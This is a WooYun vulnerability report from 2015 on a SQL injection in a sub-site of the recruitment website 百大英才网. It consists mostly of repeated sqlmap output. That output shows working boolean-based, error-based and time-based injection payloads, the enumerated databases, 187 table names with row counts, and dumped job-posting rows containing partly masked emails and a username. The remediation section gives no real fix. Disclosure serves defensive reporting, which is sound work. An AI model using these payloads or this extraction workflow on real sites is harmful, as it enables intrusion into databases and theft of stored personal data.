当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134235

漏洞标题:百大英才网分站点存在注入一枚泄漏大量数据库

相关厂商:百大英才网

漏洞作者: me1ody

提交时间:2015-08-17 12:14

修复时间:2015-10-04 08:16

公开时间:2015-10-04 08:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-20: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-30: 细节向核心白帽子及相关领域专家公开
2015-09-09: 细节向普通白帽子公开
2015-09-19: 细节向实习白帽子公开
2015-10-04: 细节向公众公开

简要描述:

大量招聘信息资料泄露

详细说明:

注入点

http://**.**.**.**/e/searchcompany/?id=975046


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] yjs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
current database: 'yjs'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'bys@localhost'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: yjs
[187 tables]
+-----------------------------------+
| phome_ecms_article |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_flash |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infoclass_xuanjianghui |
| phome_ecms_infoclass_zhaopin |
| phome_ecms_infoclass_zhaopinhui |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_infotmp_xuanjianghui |
| phome_ecms_infotmp_zhaopin |
| phome_ecms_infotmp_zhaopin_doc1 |
| phome_ecms_infotmp_zhaopinhui |
| phome_ecms_movie |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_news |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_xuanjianghui |
| phome_ecms_xuanjianghui_data_1 |
| phome_ecms_xuanjianghui_doc |
| phome_ecms_xuanjianghui_doc_data |
| phome_ecms_zhaopin |
| phome_ecms_zhaopin_data_1 |
| phome_ecms_zhaopin_data_2 |
| phome_ecms_zhaopin_doc |
| phome_ecms_zhaopin_doc_data |
| phome_ecms_zhaopinhui |
| phome_ecms_zhaopinhui_data_1 |
| phome_ecms_zhaopinhui_doc |
| phome_ecms_zhaopinhui_doc_data |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewsprinttemp |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewssp |
| phome_enewssp_1 |
| phome_enewssp_2 |
| phome_enewssp_3 |
| phome_enewssp_3_bak |
| phome_enewsspacestyle |
| phome_enewsspclass |
| phome_enewssql |
| phome_enewstable |
| phome_enewstags |
| phome_enewstagsclass |
| phome_enewstagsdata |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuseradd |
| phome_enewsuserclass |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswfinfo |
| phome_enewswfinfolog |
| phome_enewswords |
| phome_enewsworkflow |
| phome_enewsworkflowitem |
| phome_enewswriter |
| phome_enewsyh |
| phome_enewszt |
| phome_enewsztadd |
| phome_enewsztclass |
+-----------------------------------+
Database: yjs
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| phome_ecms_zhaopin | 917852 |
| phome_ecms_infotmp_zhaopin | 700799 |
| phome_ecms_zhaopin_data_2 | 636778 |
| phome_ecms_zhaopin_data_1 | 281133 |
| phome_ecms_zhaopin_doc | 48610 |
| phome_ecms_zhaopin_doc_data | 48610 |
| phome_enewsdolog | 41159 |
| phome_enewssearch | 28657 |
| phome_ecms_zhaopinhui | 13576 |
| phome_ecms_zhaopinhui_data_1 | 13576 |
| phome_ecms_xuanjianghui | 3678 |
| phome_ecms_xuanjianghui_data_1 | 3678 |
| phome_enewslog | 3676 |
| phome_ecms_news | 3630 |
| phome_ecms_news_data_1 | 3630 |
| phome_enewslinktmp | 2792 |
| phome_ecms_infotmp_zhaopinhui | 2223 |
| phome_ecms_infotmp_xuanjianghui | 1101 |
| phome_enewsfile | 485 |
| phome_enewspl | 361 |
| phome_enewspl_data_1 | 361 |
| phome_enewslink | 141 |
| phome_ecms_infotmp_news | 108 |
| phome_enewsinfoclass | 65 |
| phome_ecms_infoclass_zhaopin | 61 |
| phome_enewsf | 57 |
| phome_enewsbq | 29 |
| phome_enewskey | 29 |
| phome_enewsnewstemp | 28 |
| phome_enewsuser | 23 |
| phome_enewsuseradd | 23 |
| phome_enewsclass | 17 |
| phome_enewsbqtemp | 13 |
| phome_enewsmemberf | 12 |
| phome_enewslisttemp | 11 |
| phome_enewswriter | 11 |
| phome_enewsfeedbackf | 9 |
| phome_enewsclassadd | 8 |
| phome_enewsmember | 8 |
| phome_enewsmemberadd | 8 |
| phome_enewsshoppayfs | 6 |
| phome_enewstempvar | 6 |
| phome_enewsjstemp | 5 |
| phome_enewsnotcj | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsdo | 4 |
| phome_enewslinkclass | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsmod | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewstable | 4 |
| phome_enewsgroup | 3 |
| phome_enewspage | 3 |
| phome_enewspayapi | 3 |
| phome_enewspltemp | 3 |
| phome_enewstags | 3 |
| phome_enewsuserjs | 3 |
| phome_enewszt | 3 |
| phome_enewsztadd | 3 |
| phome_ecms_infoclass_news | 2 |
| phome_enewsadclass | 2 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsmemberform | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewssql | 2 |
| phome_enewstagsclass | 2 |
| phome_enewstagsdata | 2 |
| phome_enewsuserclass | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_enewsyh | 2 |
| phome_ecms_infoclass_xuanjianghui | 1 |
| phome_ecms_infoclass_zhaopinhui | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsloginfail | 1 |
| phome_enewspicclass | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspubtemp | 1 |
| phome_enewsqmsg | 1 |
| phome_enewssearchtemp | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsworkflow | 1 |
| phome_enewsztclass | 1 |
+-----------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: yjs
Table: phome_ecms_zhaopin
[9 entries]
+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+
| webid | didian | qiye | title | guimo | xueli | email |
+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+
| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 连锁店销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 外地分公司储备销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 形象专卖店销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 物料规划员 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 软件工程师 | \\?a0\\?a0150-500人| 大专 | mason.zhang@**.**.**.** |
| 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 财务分析员 | \\?a0\\?a0150-500人| 本科 | judy.mu@**.**.**.** |
| 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | 配置管理工程师 | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |
| 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | 招聘助理(实习生) | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |
| 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | IBM(TIM/TAM) Application Support Engineer | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |
+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: yjs
Table: phome_ecms_infotmp_zhaopin
[2 entries]
+-----------------+----------------------------------------------------------------------+----------+
| title | oldurl | username |
+-----------------+----------------------------------------------------------------------+----------+
| 行政文员 | http://**.**.**.**/beijing/行政 | liqing |
| planning leader | http://**.**.**.**/shanghai/PLANNING+LEADER_218769818250437.htm | liqing |
+-----------------+----------------------------------------------------------------------+----------+


删掉了一些没用的咧

漏洞证明:

+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| phome_ecms_zhaopin | 917852 |
| phome_ecms_infotmp_zhaopin | 700799 |
| phome_ecms_zhaopin_data_2 | 636778 |
| phome_ecms_zhaopin_data_1 | 281133 |
| phome_ecms_zhaopin_doc | 48610 |
| phome_ecms_zhaopin_doc_data | 48610 |
| phome_enewsdolog | 41159 |
| phome_enewssearch | 28657 |
| phome_ecms_zhaopinhui | 13576 |
| phome_ecms_zhaopinhui_data_1 | 13576 |
| phome_ecms_xuanjianghui | 3678 |
| phome_ecms_xuanjianghui_data_1 | 3678 |
| phome_enewslog | 3676 |
| phome_ecms_news | 3630 |
| phome_ecms_news_data_1 | 3630 |
| phome_enewslinktmp | 2792 |
| phome_ecms_infotmp_zhaopinhui | 2223 |
| phome_ecms_infotmp_xuanjianghui | 1101 |
| phome_enewsfile | 485 |
| phome_enewspl | 361 |
| phome_enewspl_data_1 | 361 |
| phome_enewslink | 141 |
| phome_ecms_infotmp_news | 108 |
| phome_enewsinfoclass | 65 |
| phome_ecms_infoclass_zhaopin | 61 |
| phome_enewsf | 57 |
| phome_enewsbq | 29 |
| phome_enewskey | 29 |
| phome_enewsnewstemp | 28 |
| phome_enewsuser | 23 |
| phome_enewsuseradd | 23 |
| phome_enewsclass | 17 |
| phome_enewsbqtemp | 13 |
| phome_enewsmemberf | 12 |
| phome_enewslisttemp | 11 |
| phome_enewswriter | 11 |
| phome_enewsfeedbackf | 9 |
| phome_enewsclassadd | 8 |
| phome_enewsmember | 8 |
| phome_enewsmemberadd | 8 |
| phome_enewsshoppayfs | 6 |
| phome_enewstempvar | 6 |
| phome_enewsjstemp | 5 |
| phome_enewsnotcj | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsdo | 4 |
| phome_enewslinkclass | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsmod | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewstable | 4 |
| phome_enewsgroup | 3 |
| phome_enewspage | 3 |
| phome_enewspayapi | 3 |
| phome_enewspltemp | 3 |
| phome_enewstags | 3 |
| phome_enewsuserjs | 3 |
| phome_enewszt | 3 |
| phome_enewsztadd | 3 |
| phome_ecms_infoclass_news | 2 |
| phome_enewsadclass | 2 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsmemberform | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewssql | 2 |
| phome_enewstagsclass | 2 |
| phome_enewstagsdata | 2 |
| phome_enewsuserclass | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_enewsyh | 2 |
| phome_ecms_infoclass_xuanjianghui | 1 |
| phome_ecms_infoclass_zhaopinhui | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsloginfail | 1 |
| phome_enewspicclass | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspubtemp | 1 |
| phome_enewsqmsg | 1 |
| phome_enewssearchtemp | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsworkflow | 1 |
| phome_enewsztclass | 1 |
+-----------------------------------+---------+

修复方案:

你们专业

版权声明:转载请注明来源 me1ody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-20 08:15

厂商回复:

暂未能建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无